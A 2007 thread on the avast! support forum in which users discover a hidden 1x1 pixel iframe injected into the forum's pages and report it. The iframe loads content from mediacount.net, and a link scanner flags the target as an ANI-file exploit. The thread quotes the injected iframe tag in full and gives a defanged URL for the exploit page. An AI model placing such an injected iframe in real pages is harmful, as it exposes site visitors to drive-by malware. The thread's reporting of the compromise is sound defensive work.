Author Topic: [Malware on Forum, iFrame tag] What does the forum use mediacount.net for ?  (Read 21131 times)

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69211
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
I have been experiencing problem posting replies to topics in that the instead of the topic being displayed with the new pot added it hangs in mid post or that is what it appears to do. If I go back and refresh the topic I can see the post I added.

When this hang happens I saw a 1 pixel square at the top left of the screen and it would appear that there is another script running form mediacount, in the forum of an iFrame 1 pixel X 1 pixel. I had noticed this square in previous pages but didn't twig what it was.

Code: [Select]
<iframe src='http://mediacount.net/strong/020sdsfg' width=1 height=1></iframe>I don't know what the consequences of placing an iFrame outside of the body/head of a wc3 standard page would be.

This I believe is happening because I have noscript and firefox, and becake this is a new addition to avast pages, I have only allowed avast.com and google-analytics.com and not mediacount.net. It took ages to find this and trying to ad mediacount.net is proving to be difficult.

Is anyone else experiencing this problem or noticing the 1 pixel square at the top left of pages ?

So what is avast using mediacount.net for and why use an iFrame tag, which is notorious for introducing malware into systems as it can run scripts with user input ?
This use of an iFrame tag on what is a security based web site I feel is a big mistake.

Edit: Looks like this mention of the iframe and malware exploit proved to be very accurate (see images below).
« Last Edit: August 24, 2007, 11:04:30 PM by DavidR »
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69211
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Re: What does the forum use mediacount.net for ?
« Reply #1 on: August 24, 2007, 10:00:36 PM »
This is what the screen looks like with the 1 pixel iFrame if experiencing this problem.

If the hang occurs the URL in the window is where it hangs.

Edit: The images I tried to attach failed because the malware iframe screwed with the attachments and they don't display so I have removed 1-pixel.gif and 1-pixel-hang.gif to avoid anyone trying to load them.
« Last Edit: August 25, 2007, 12:27:07 AM by DavidR »
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69211
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Re: What does the forum use mediacount.net for ?
« Reply #2 on: August 24, 2007, 10:10:26 PM »
There also seems to be a further problem in that the attached images don't display either.

So since this mediacount.net iFrame it has screwed my forum use with the Babylon theme, making it almost impossible to use the forum not knowing if the post was successful. Not very useful when you post about 20 posts a day.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69211
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Re: What does the forum use mediacount.net for ?
« Reply #3 on: August 24, 2007, 10:25:03 PM »
Test, with NoScript disabled.

Edit: absolutely no change with NoScript disabled. I have no idea what is going on since this iFrame for mediacount.net has been added but it totally screws me up.
« Last Edit: August 24, 2007, 10:27:05 PM by DavidR »
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69211
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Re: What does the forum use mediacount.net for ?
« Reply #4 on: August 24, 2007, 10:58:03 PM »
Well I guess I found out a little more it would appear that the iFrame is a malware infestation on the forums, I wondered why it was lonely on the forums.



This is the link the iFrame goes to and DrWeb link scanner reports Exploit.ANIFile
http[break]://[break] mediacount.net/strong/020sdsfg/324123.htm

Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69211
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Wow, its lonely on here, I have just looked at the recent posts and I'm the only one soldiering on  with 10 out of the last 12 posts since 6 p.m. UK local time.

I have reported the forum as infected to virus @ avast . com lets hope it is resolved quickly.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline Tech

  • avast! team
  • Certainly Bot
  • *
  • Posts: 64880
  • Gender: Male
    • Personal Message (Offline)
Seems it's working now... testing...
Edited: the page does not come back to the same topic but to an empty page... strange. Look at the active tab in Firefox...
« Last Edit: August 25, 2007, 01:14:34 AM by Tech™ »
The best things in life are free.

Offline Tech

  • avast! team
  • Certainly Bot
  • *
  • Posts: 64880
  • Gender: Male
    • Personal Message (Offline)
I can't quote...
The page does not come back to the original thread but to a blank page...
The best things in life are free.

Offline StopMe

  • Super Poster
  • ***
  • Posts: 1200
    • Personal Message (Offline)
I noticed the 1x1 pixel square whenever I log in. I had mediacount.net disabled by No-Script but when I disable No-Script, I still see the square as well.   :-\

Wilders are also talking about it here

Offline Tarq57

  • avast! Evangelist
  • Massive Poster
  • ***
  • Posts: 3696
  • Gender: Male
  • If at first you don’t succeed; call it version 1.0
    • Personal Message (Offline)
Well, I'm glad I read these posts. Have been unable to log on in Firefox, and when I attempt in IE7, Avast AV blocks the page from loading. Ironic.
Strange. Just noticed I am logged on. Just got a pixel before.
Also unable to modify profile.

WindowsXP Home SP3,Avast Free 5.1.889,Windows Firewall, Autorun Eater,Firefox w/Noscript+ /Adblock+/Better Privacy, IE8 all zones except MS Update set to "untrusted" settings,MVPS Host file.SecuniaPSI.

Offline kubecj

  • Administrator
  • Advanced Poster
  • ***
  • Posts: 1127
  • Gender: Male
    • ALWIL Software
    • Personal Message (Offline)
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.

How would the person know I'm _far_ away from my computer?  ::)
Jindrich Kubec

Offline DavidR

  • avast! Überevangelist
  • Certainly Bot
  • *****
  • Posts: 69211
  • Gender: Male
  • No support PMs thanks
    • Personal Message (Offline)
Firefox by all accounts isn't vulnerable to this attach by all accounts, even with noscript disabled, when I experienced page problem I checked the page source in trying to track the problem and saw the iframe tag. At first I just thought the forums was using it to gather page visited data, etc. and thought it a crazy method to do it.

However, when I tried using avant an IE clone web shield alerted. So I twigged the site had been infected, so I sent a report to avast.

These were the two images I tried to attach earlier that failed.

It would be interesting to know if this was purely a security failing of SMC 1.1.2 as I found several such issues on the Simple Machines forums and they were also using 1.1.2 but it seemed they also had a weakness in their webhosting service.
Core2Duo E8300/ 4GB Ram/ WinXP ProSP3/ avast! free 2014 9.0.2018/ Outpost Firewall Pro9.1/ Firefox 28.0, NoScript, RequestPolicy/ MailWasher Pro/ DropMyRights/ MalwareBytes AntiMalware Premium 2.0.1/ WinPatrol+/ Drive Image 7.1/ SnagIt 10.0/ avast! mobile security

Offline bob3160

  • avast! Überevangelist
  • Maybe Bot
  • *****
  • Posts: 23939
  • Gender: Male
  • 53 Years of Happiness
    • bob3160 Protecting Yourself, Your Computer and, Your Identity
    • Personal Message (Offline)
Here is what I got yesterday:


and most of today, I was greeted with the following:



Glad the forum is back but would like an explanation.  :)
« Last Edit: August 25, 2007, 10:59:27 PM by bob3160 »
Free avast! Security Seminar: http://www.authorstream.com/Presentation/bob3160-1425909-protecting-yourself/    -  Important: http://www.organdonor.gov/
My Blog: http://bob3160.blogspot.com/ - Win 8.1 Pro 64bit, 4 Gig Ram, avast!2014.9.0.2015 Free, MBAM, WinPatrol -- How to Successfully Install avast! http://goo.gl/VLXde
                     - It's nice to be Important. - It's more important to be Nice. -

Offline news

  • Full Member
  • ***
  • Posts: 174
    • Personal Message (Offline)
I have no idea how this was able to come through. I removed that, upgraded to latest version, will investigate.

How would the person know I'm _far_ away from my computer?  ::)

Well I'm glad you're close to your computer..now.   :)

Offline Tech

  • avast! team
  • Certainly Bot
  • *
  • Posts: 64880
  • Gender: Male
    • Personal Message (Offline)
How would the person know I'm _far_ away from my computer?  ::)
Inside information? ;D
The best things in life are free.

 

Google Chrome

AVAST recommends using the FREE Google Chrome™ browser.

Download Google Chrome Now